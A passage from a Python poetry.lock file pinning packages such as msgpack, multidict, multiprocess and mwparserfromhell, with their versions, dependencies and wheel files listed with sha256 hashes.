{file = "msgpack-1.0.7-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ebbbba226f0a108a7366bf4b59bf0f30a12fd5e75100c630267d94d7f0ad20e5"},
{file = "msgpack-1.0.7-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1e2d69948e4132813b8d1131f29f9101bc2c915f26089a6d632001a5c1349672"},
{file = "msgpack-1.0.7-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bdf38ba2d393c7911ae989c3bbba510ebbcdf4ecbdbfec36272abe350c454075"},
{file = "msgpack-1.0.7-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:993584fc821c58d5993521bfdcd31a4adf025c7d745bbd4d12ccfecf695af5ba"},
{file = "msgpack-1.0.7-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:52700dc63a4676669b341ba33520f4d6e43d3ca58d422e22ba66d1736b0a6e4c"},
{file = "msgpack-1.0.7-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:e45ae4927759289c30ccba8d9fdce62bb414977ba158286b5ddaf8df2cddb5c5"},
{file = "msgpack-1.0.7-cp312-cp312-win32.whl", hash = "sha256:27dcd6f46a21c18fa5e5deed92a43d4554e3df8d8ca5a47bf0615d6a5f39dbc9"},
{file = "msgpack-1.0.7-cp312-cp312-win_amd64.whl", hash = "sha256:7687e22a31e976a0e7fc99c2f4d11ca45eff652a81eb8c8085e9609298916dcf"},
{file = "msgpack-1.0.7-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5b6ccc0c85916998d788b295765ea0e9cb9aac7e4a8ed71d12e7d8ac31c23c95"},
{file = "msgpack-1.0.7-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:235a31ec7db685f5c82233bddf9858748b89b8119bf4538d514536c485c15fe0"},
{file = "msgpack-1.0.7-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:cab3db8bab4b7e635c1c97270d7a4b2a90c070b33cbc00c99ef3f9be03d3e1f7"},
{file = "msgpack-1.0.7-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0bfdd914e55e0d2c9e1526de210f6fe8ffe9705f2b1dfcc4aecc92a4cb4b533d"},
{file = "msgpack-1.0.7-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:36e17c4592231a7dbd2ed09027823ab295d2791b3b1efb2aee874b10548b7524"},
{file = "msgpack-1.0.7-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:38949d30b11ae5f95c3c91917ee7a6b239f5ec276f271f28638dec9156f82cfc"},
{file = "msgpack-1.0.7-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:ff1d0899f104f3921d94579a5638847f783c9b04f2d5f229392ca77fba5b82fc"},
{file = "msgpack-1.0.7-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:dc43f1ec66eb8440567186ae2f8c447d91e0372d793dfe8c222aec857b81a8cf"},
{file = "msgpack-1.0.7-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:dd632777ff3beaaf629f1ab4396caf7ba0bdd075d948a69460d13d44357aca4c"},
{file = "msgpack-1.0.7-cp38-cp38-win32.whl", hash = "sha256:4e71bc4416de195d6e9b4ee93ad3f2f6b2ce11d042b4d7a7ee00bbe0358bd0c2"},
{file = "msgpack-1.0.7-cp38-cp38-win_amd64.whl", hash = "sha256:8f5b234f567cf76ee489502ceb7165c2a5cecec081db2b37e35332b537f8157c"},
{file = "msgpack-1.0.7-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:bfef2bb6ef068827bbd021017a107194956918ab43ce4d6dc945ffa13efbc25f"},
{file = "msgpack-1.0.7-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:484ae3240666ad34cfa31eea7b8c6cd2f1fdaae21d73ce2974211df099a95d81"},
{file = "msgpack-1.0.7-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3967e4ad1aa9da62fd53e346ed17d7b2e922cba5ab93bdd46febcac39be636fc"},
{file = "msgpack-1.0.7-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8dd178c4c80706546702c59529ffc005681bd6dc2ea234c450661b205445a34d"},
{file = "msgpack-1.0.7-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f6ffbc252eb0d229aeb2f9ad051200668fc3a9aaa8994e49f0cb2ffe2b7867e7"},
{file = "msgpack-1.0.7-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:822ea70dc4018c7e6223f13affd1c5c30c0f5c12ac1f96cd8e9949acddb48a61"},
{file = "msgpack-1.0.7-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:384d779f0d6f1b110eae74cb0659d9aa6ff35aaf547b3955abf2ab4c901c4819"},
{file = "msgpack-1.0.7-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:f64e376cd20d3f030190e8c32e1c64582eba56ac6dc7d5b0b49a9d44021b52fd"},
{file = "msgpack-1.0.7-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5ed82f5a7af3697b1c4786053736f24a0efd0a1b8a130d4c7bfee4b9ded0f08f"},
{file = "msgpack-1.0.7-cp39-cp39-win32.whl", hash = "sha256:f26a07a6e877c76a88e3cecac8531908d980d3d5067ff69213653649ec0f60ad"},
{file = "msgpack-1.0.7-cp39-cp39-win_amd64.whl", hash = "sha256:1dc93e8e4653bdb5910aed79f11e165c85732067614f180f70534f056da97db3"},
{file = "msgpack-1.0.7.tar.gz", hash = "sha256:572efc93db7a4d27e404501975ca6d2d9775705c2d922390d878fcf768d92c87"},
]
[[package]]
name = "msrest"
version = "0.7.1"
description = "AutoRest swagger generator Python client runtime."
optional = true
python-versions = ">=3.6"
files = [
{file = "msrest-0.7.1-py3-none-any.whl", hash = "sha256:21120a810e1233e5e6cc7fe40b474eeb4ec6f757a15d7cf86702c369f9567c32"},
{file = "msrest-0.7.1.zip", hash = "sha256:6e7661f46f3afd88b75667b7187a92829924446c7ea1d169be8c4bb7eeb788b9"},
]
[package.dependencies]
azure-core = ">=1.24.0"
certifi = ">=2017.4.17"
isodate = ">=0.6.0"
requests = ">=2.16,<3.0"
requests-oauthlib = ">=0.5.0"
[package.extras]
async = ["aiodns", "aiohttp (>=3.0)"]
[[package]]
name = "multidict"
version = "6.0.4"
description = "multidict implementation"
optional = false
python-versions = ">=3.7"
files = [
{file = "multidict-6.0.4-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:0b1a97283e0c85772d613878028fec909f003993e1007eafa715b24b377cb9b8"},
{file = "multidict-6.0.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:eeb6dcc05e911516ae3d1f207d4b0520d07f54484c49dfc294d6e7d63b734171"},
{file = "multidict-6.0.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:d6d635d5209b82a3492508cf5b365f3446afb65ae7ebd755e70e18f287b0adf7"},
{file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c048099e4c9e9d615545e2001d3d8a4380bd403e1a0578734e0d31703d1b0c0b"},
{file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ea20853c6dbbb53ed34cb4d080382169b6f4554d394015f1bef35e881bf83547"},
{file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:16d232d4e5396c2efbbf4f6d4df89bfa905eb0d4dc5b3549d872ab898451f569"},
{file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:36c63aaa167f6c6b04ef2c85704e93af16c11d20de1d133e39de6a0e84582a93"},
{file = "multidict-6.0.4-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:64bdf1086b6043bf519869678f5f2757f473dee970d7abf6da91ec00acb9cb98"},
{file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:43644e38f42e3af682690876cff722d301ac585c5b9e1eacc013b7a3f7b696a0"},
{file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:7582a1d1030e15422262de9f58711774e02fa80df0d1578995c76214f6954988"},
{file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:ddff9c4e225a63a5afab9dd15590432c22e8057e1a9a13d28ed128ecf047bbdc"},
{file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:ee2a1ece51b9b9e7752e742cfb661d2a29e7bcdba2d27e66e28a99f1890e4fa0"},
{file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:a2e4369eb3d47d2034032a26c7a80fcb21a2cb22e1173d761a162f11e562caa5"},
{file = "multidict-6.0.4-cp310-cp310-win32.whl", hash = "sha256:574b7eae1ab267e5f8285f0fe881f17efe4b98c39a40858247720935b893bba8"},
{file = "multidict-6.0.4-cp310-cp310-win_amd64.whl", hash = "sha256:4dcbb0906e38440fa3e325df2359ac6cb043df8e58c965bb45f4e406ecb162cc"},
{file = "multidict-6.0.4-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:0dfad7a5a1e39c53ed00d2dd0c2e36aed4650936dc18fd9a1826a5ae1cad6f03"},
{file = "multidict-6.0.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:64da238a09d6039e3bd39bb3aee9c21a5e34f28bfa5aa22518581f910ff94af3"},
{file = "multidict-6.0.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ff959bee35038c4624250473988b24f846cbeb2c6639de3602c073f10410ceba"},
{file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:01a3a55bd90018c9c080fbb0b9f4891db37d148a0a18722b42f94694f8b6d4c9"},
{file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c5cb09abb18c1ea940fb99360ea0396f34d46566f157122c92dfa069d3e0e982"},
{file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:666daae833559deb2d609afa4490b85830ab0dfca811a98b70a205621a6109fe"},
{file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:11bdf3f5e1518b24530b8241529d2050014c884cf18b6fc69c0c2b30ca248710"},
{file = "multidict-6.0.4-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7d18748f2d30f94f498e852c67d61261c643b349b9d2a581131725595c45ec6c"},
{file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:458f37be2d9e4c95e2d8866a851663cbc76e865b78395090786f6cd9b3bbf4f4"},
{file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:b1a2eeedcead3a41694130495593a559a668f382eee0727352b9a41e1c45759a"},
{file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:7d6ae9d593ef8641544d6263c7fa6408cc90370c8cb2bbb65f8d43e5b0351d9c"},
{file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:5979b5632c3e3534e42ca6ff856bb24b2e3071b37861c2c727ce220d80eee9ed"},
{file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:dcfe792765fab89c365123c81046ad4103fcabbc4f56d1c1997e6715e8015461"},
{file = "multidict-6.0.4-cp311-cp311-win32.whl", hash = "sha256:3601a3cece3819534b11d4efc1eb76047488fddd0c85a3948099d5da4d504636"},
{file = "multidict-6.0.4-cp311-cp311-win_amd64.whl", hash = "sha256:81a4f0b34bd92df3da93315c6a59034df95866014ac08535fc819f043bfd51f0"},
{file = "multidict-6.0.4-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:67040058f37a2a51ed8ea8f6b0e6ee5bd78ca67f169ce6122f3e2ec80dfe9b78"},
{file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:853888594621e6604c978ce2a0444a1e6e70c8d253ab65ba11657659dcc9100f"},
{file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:39ff62e7d0f26c248b15e364517a72932a611a9b75f35b45be078d81bdb86603"},
{file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:af048912e045a2dc732847d33821a9d84ba553f5c5f028adbd364dd4765092ac"},
{file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b1e8b901e607795ec06c9e42530788c45ac21ef3aaa11dbd0c69de543bfb79a9"},
{file = "multidict-6.0.4-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:62501642008a8b9871ddfccbf83e4222cf8ac0d5aeedf73da36153ef2ec222d2"},
{file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:99b76c052e9f1bc0721f7541e5e8c05db3941eb9ebe7b8553c625ef88d6eefde"},
{file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:509eac6cf09c794aa27bcacfd4d62c885cce62bef7b2c3e8b2e49d365b5003fe"},
{file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:21a12c4eb6ddc9952c415f24eef97e3e55ba3af61f67c7bc388dcdec1404a067"},
{file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:5cad9430ab3e2e4fa4a2ef4450f548768400a2ac635841bc2a56a2052cdbeb87"},
{file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:ab55edc2e84460694295f401215f4a58597f8f7c9466faec545093045476327d"},
{file = "multidict-6.0.4-cp37-cp37m-win32.whl", hash = "sha256:5a4dcf02b908c3b8b17a45fb0f15b695bf117a67b76b7ad18b73cf8e92608775"},
{file = "multidict-6.0.4-cp37-cp37m-win_amd64.whl", hash = "sha256:6ed5f161328b7df384d71b07317f4d8656434e34591f20552c7bcef27b0ab88e"},
{file = "multidict-6.0.4-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5fc1b16f586f049820c5c5b17bb4ee7583092fa0d1c4e28b5239181ff9532e0c"},
{file = "multidict-6.0.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1502e24330eb681bdaa3eb70d6358e818e8e8f908a22a1851dfd4e15bc2f8161"},
{file = "multidict-6.0.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b692f419760c0e65d060959df05f2a531945af31fda0c8a3b3195d4efd06de11"},
{file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:45e1ecb0379bfaab5eef059f50115b54571acfbe422a14f668fc8c27ba410e7e"},
{file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ddd3915998d93fbcd2566ddf9cf62cdb35c9e093075f862935573d265cf8f65d"},
{file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:59d43b61c59d82f2effb39a93c48b845efe23a3852d201ed2d24ba830d0b4cf2"},
{file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cc8e1d0c705233c5dd0c5e6460fbad7827d5d36f310a0fadfd45cc3029762258"},
{file = "multidict-6.0.4-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d6aa0418fcc838522256761b3415822626f866758ee0bc6632c9486b179d0b52"},
{file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:6748717bb10339c4760c1e63da040f5f29f5ed6e59d76daee30305894069a660"},
{file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:4d1a3d7ef5e96b1c9e92f973e43aa5e5b96c659c9bc3124acbbd81b0b9c8a951"},
{file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:4372381634485bec7e46718edc71528024fcdc6f835baefe517b34a33c731d60"},
{file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:fc35cb4676846ef752816d5be2193a1e8367b4c1397b74a565a9d0389c433a1d"},
{file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:4b9d9e4e2b37daddb5c23ea33a3417901fa7c7b3dee2d855f63ee67a0b21e5b1"},
{file = "multidict-6.0.4-cp38-cp38-win32.whl", hash = "sha256:e41b7e2b59679edfa309e8db64fdf22399eec4b0b24694e1b2104fb789207779"},
{file = "multidict-6.0.4-cp38-cp38-win_amd64.whl", hash = "sha256:d6c254ba6e45d8e72739281ebc46ea5eb5f101234f3ce171f0e9f5cc86991480"},
{file = "multidict-6.0.4-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:16ab77bbeb596e14212e7bab8429f24c1579234a3a462105cda4a66904998664"},
{file = "multidict-6.0.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:bc779e9e6f7fda81b3f9aa58e3a6091d49ad528b11ed19f6621408806204ad35"},
{file = "multidict-6.0.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:4ceef517eca3e03c1cceb22030a3e39cb399ac86bff4e426d4fc6ae49052cc60"},
{file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:281af09f488903fde97923c7744bb001a9b23b039a909460d0f14edc7bf59706"},
{file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:52f2dffc8acaba9a2f27174c41c9e57f60b907bb9f096b36b1a1f3be71c6284d"},
{file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b41156839806aecb3641f3208c0dafd3ac7775b9c4c422d82ee2a45c34ba81ca"},
{file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d5e3fc56f88cc98ef8139255cf8cd63eb2c586531e43310ff859d6bb3a6b51f1"},
{file = "multidict-6.0.4-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8316a77808c501004802f9beebde51c9f857054a0c871bd6da8280e718444449"},
{file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:f70b98cd94886b49d91170ef23ec5c0e8ebb6f242d734ed7ed677b24d50c82cf"},
{file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:bf6774e60d67a9efe02b3616fee22441d86fab4c6d335f9d2051d19d90a40063"},
{file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:e69924bfcdda39b722ef4d9aa762b2dd38e4632b3641b1d9a57ca9cd18f2f83a"},
{file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:6b181d8c23da913d4ff585afd1155a0e1194c0b50c54fcfe286f70cdaf2b7176"},
{file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:52509b5be062d9eafc8170e53026fbc54cf3b32759a23d07fd935fb04fc22d95"},
{file = "multidict-6.0.4-cp39-cp39-win32.whl", hash = "sha256:27c523fbfbdfd19c6867af7346332b62b586eed663887392cff78d614f9ec313"},
{file = "multidict-6.0.4-cp39-cp39-win_amd64.whl", hash = "sha256:33029f5734336aa0d4c0384525da0387ef89148dc7191aae00ca5fb23d7aafc2"},
{file = "multidict-6.0.4.tar.gz", hash = "sha256:3666906492efb76453c0e7b97f2cf459b0682e7402c0489a95484965dbc1da49"},
]
[[package]]
name = "multiprocess"
version = "0.70.15"
description = "better multiprocessing and multithreading in Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "multiprocess-0.70.15-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:aa36c7ed16f508091438687fe9baa393a7a8e206731d321e443745e743a0d4e5"},
{file = "multiprocess-0.70.15-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:20e024018c46d0d1602024c613007ac948f9754659e3853b0aa705e83f6931d8"},
{file = "multiprocess-0.70.15-pp37-pypy37_pp73-manylinux_2_24_i686.whl", hash = "sha256:e576062981c91f0fe8a463c3d52506e598dfc51320a8dd8d78b987dfca91c5db"},
{file = "multiprocess-0.70.15-pp37-pypy37_pp73-manylinux_2_24_x86_64.whl", hash = "sha256:e73f497e6696a0f5433ada2b3d599ae733b87a6e8b008e387c62ac9127add177"},
{file = "multiprocess-0.70.15-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:73db2e7b32dcc7f9b0f075c2ffa45c90b6729d3f1805f27e88534c8d321a1be5"},
{file = "multiprocess-0.70.15-pp38-pypy38_pp73-manylinux_2_24_i686.whl", hash = "sha256:4271647bd8a49c28ecd6eb56a7fdbd3c212c45529ad5303b40b3c65fc6928e5f"},
{file = "multiprocess-0.70.15-pp38-pypy38_pp73-manylinux_2_24_x86_64.whl", hash = "sha256:cf981fb998d6ec3208cb14f0cf2e9e80216e834f5d51fd09ebc937c32b960902"},
{file = "multiprocess-0.70.15-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:18f9f2c7063346d1617bd1684fdcae8d33380ae96b99427260f562e1a1228b67"},
{file = "multiprocess-0.70.15-pp39-pypy39_pp73-manylinux_2_24_i686.whl", hash = "sha256:0eac53214d664c49a34695e5824872db4006b1a465edd7459a251809c3773370"},
{file = "multiprocess-0.70.15-pp39-pypy39_pp73-manylinux_2_24_x86_64.whl", hash = "sha256:1a51dd34096db47fb21fa2b839e615b051d51b97af9a67afbcdaa67186b44883"},
{file = "multiprocess-0.70.15-py310-none-any.whl", hash = "sha256:7dd58e33235e83cf09d625e55cffd7b0f0eede7ee9223cdd666a87624f60c21a"},
{file = "multiprocess-0.70.15-py311-none-any.whl", hash = "sha256:134f89053d82c9ed3b73edd3a2531eb791e602d4f4156fc92a79259590bd9670"},
{file = "multiprocess-0.70.15-py37-none-any.whl", hash = "sha256:f7d4a1629bccb433114c3b4885f69eccc200994323c80f6feee73b0edc9199c5"},
{file = "multiprocess-0.70.15-py38-none-any.whl", hash = "sha256:bee9afba476c91f9ebee7beeee0601face9eff67d822e893f9a893725fbd6316"},
{file = "multiprocess-0.70.15-py39-none-any.whl", hash = "sha256:3e0953f5d52b4c76f1c973eaf8214554d146f2be5decb48e928e55c7a2d19338"},
{file = "multiprocess-0.70.15.tar.gz", hash = "sha256:f20eed3036c0ef477b07a4177cf7c1ba520d9a2677870a4f47fe026f0cd6787e"},
]
[package.dependencies]
dill = ">=0.3.7"
[[package]]
name = "mwcli"
version = "0.0.3"
description = "Utilities for processing MediaWiki on the command line."
optional = true
python-versions = "*"
files = [
{file = "mwcli-0.0.3-py2.py3-none-any.whl", hash = "sha256:24a7e53730e6fa7e55626e4f2a61a0b016d5e0a9798306c1d8c71bcead0ab239"},
{file = "mwcli-0.0.3.tar.gz", hash = "sha256:00331bd0ff16b5721c9c6274d91e25fd355f45ec0773c8a0e3926eac058719a0"},
]
[package.dependencies]
docopt = "*"
mwxml = "*"
para = "*"
[[package]]
name = "mwparserfromhell"
version = "0.6.5"
description = "MWParserFromHell is a parser for MediaWiki wikicode."
optional = true
python-versions = ">= 3.7"
files = [
{file = "mwparserfromhell-0.6.5-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:b3a941ea35fc4fb49fc8d9087490ee8d94e09fb8e08b3bca83fc99cb4577bb81"},
{file = "mwparserfromhell-0.6.5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a3b27580eebda2685ab5e54381df0845f13acb8ca7d50f754378184756e13bf"},
{file = "mwparserfromhell-0.6.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6169f314d6c28f0f373b5b2b346c51058248c8897493ed7c490db7caa65ea729"},
{file = "mwparserfromhell-0.6.5-cp310-cp310-win32.whl", hash = "sha256:b60e575e1e5c17a2e316b12a143de04665c4b1189a61a3a534967d33b57394cd"},
{file = "mwparserfromhell-0.6.5-cp310-cp310-win_amd64.whl", hash = "sha256:30747186171f6c58858c04eb617dd82dff2ae06d6f9e1b94714698daa32bc664"},
{file = "mwparserfromhell-0.6.5-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:837e6adf0963ddf5317f789541ea109108515ccd2405cd1437ff8224294c3fa7"},
{file = "mwparserfromhell-0.6.5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3a3ba57207582de52345e69187218bd35cf3675497fd383bc70e46c0c728d50f"},
{file = "mwparserfromhell-0.6.5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7984215a21b0778b90724643df24e8dbb89aecb95af2ba56a42a1956fcbeb571"},
{file = "mwparserfromhell-0.6.5-cp311-cp311-win32.whl", hash = "sha256:0c055324ad12c80f1ee2175c1d1b29b997aab57f6010174e704de15fdcb1757b"},
{file = "mwparserfromhell-0.6.5-cp311-cp311-win_amd64.whl", hash = "sha256:f252f09c4bf5432bd91a6aa79c707753ff084454cb24f8b513187531d5f6295f"},
{file = "mwparserfromhell-0.6.5-cp37-cp37m-macosx_11_0_x86_64.whl", hash = "sha256:61d1e01cc027fe3d94c7d3620cb6ea9648305795a66bb93747d418a15c0d1860"},
{file = "mwparserfromhell-0.6.5-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4932d27cd3f00b451579c97c31e45d1e236b643bb93eeddde8d4aca50d87e3e6"},
{file = "mwparserfromhell-0.6.5-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:51e56993b7a351a44bdb9af7abbb72f3383fcb46f69e556f6116397598f6f3bb"},
{file = "mwparserfromhell-0.6.5-cp37-cp37m-win32.whl", hash = "sha256:eb1afb65e5b8a0e3eba35644347cd5304c6e7803571db042850dc0697bbe49a3"},
{file = "mwparserfromhell-0.6.5-cp37-cp37m-win_amd64.whl", hash = "sha256:05b8262dc13c83e023ea6d17e5e5bcef225c2c172621c71cad947958afbaf4e4"},
{file = "mwparserfromhell-0.6.5-cp38-cp38-macosx_11_0_x86_64.whl", hash = "sha256:7408b3ce5f0b328e86be3809e906fc378767ef5396565b7411963452ad3bbf12"},
{file = "mwparserfromhell-0.6.5-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1660c5558cd9a32b3e72c0e3aabdd6729a013d8e1b5695d4bdb478f691d9657e"},
{file = "mwparserfromhell-0.6.5-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b205ce558596c35eacec863b3c88e9081872aa56b471ffd4f54162480d75f8d1"},
{file = "mwparserfromhell-0.6.5-cp38-cp38-win32.whl", hash = "sha256:b09a62cac76ae0cb0daef309a93ecc23d3fbcd8e68a646517c6ac8479c4cc5fe"},
{file = "mwparserfromhell-0.6.5-cp38-cp38-win_amd64.whl", hash = "sha256:2ecc86c6b29354adb472553bf982b6bd05fd21ac41c44d454d2aac06ca456163"},
{file = "mwparserfromhell-0.6.5-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:76234df2d138542ae839bebe53d4e4f59b286d0287101f54d1b84d9d193d5848"},
{file = "mwparserfromhell-0.6.5-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b5be5f476bf4077bfc6fefcb3ccb21900f63b36c09ef0bb63667e21f09be2198"},
{file = "mwparserfromhell-0.6.5-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8b4d5e87d2b405eb493f86a3f0e513d4e2c30edde6b8d3b4f7d2a53ffac5d81a"},
{file = "mwparserfromhell-0.6.5-cp39-cp39-win32.whl", hash = "sha256:7f6e5505014d0e97e29bc01304e8f6a8d782dec55c53492cc7ca03d2a6d1e445"},
{file = "mwparserfromhell-0.6.5-cp39-cp39-win_amd64.whl", hash = "sha256:153243177c4c242880e9c4547880e834f01d04625ad0bc175693255dfb22dae5"},
{file = "mwparserfromhell-0.6.5.tar.gz", hash = "sha256:2bad0bff614576399e4470d6400ba29c52d595682a4b8de642afbb5bebf4a346"},
]
[[package]]
name = "mwtypes"
version = "0.3.2"
description = "A set of types for processing MediaWiki data."
optional = true
python-versions = "*"
files = [
{file = "mwtypes-0.3.2-py2.py3-none-any.whl", hash = "sha256:d6f3cae90eea4c88bc260101c8a082fb0ab22cca88e7474657b28cd9538794f3"},
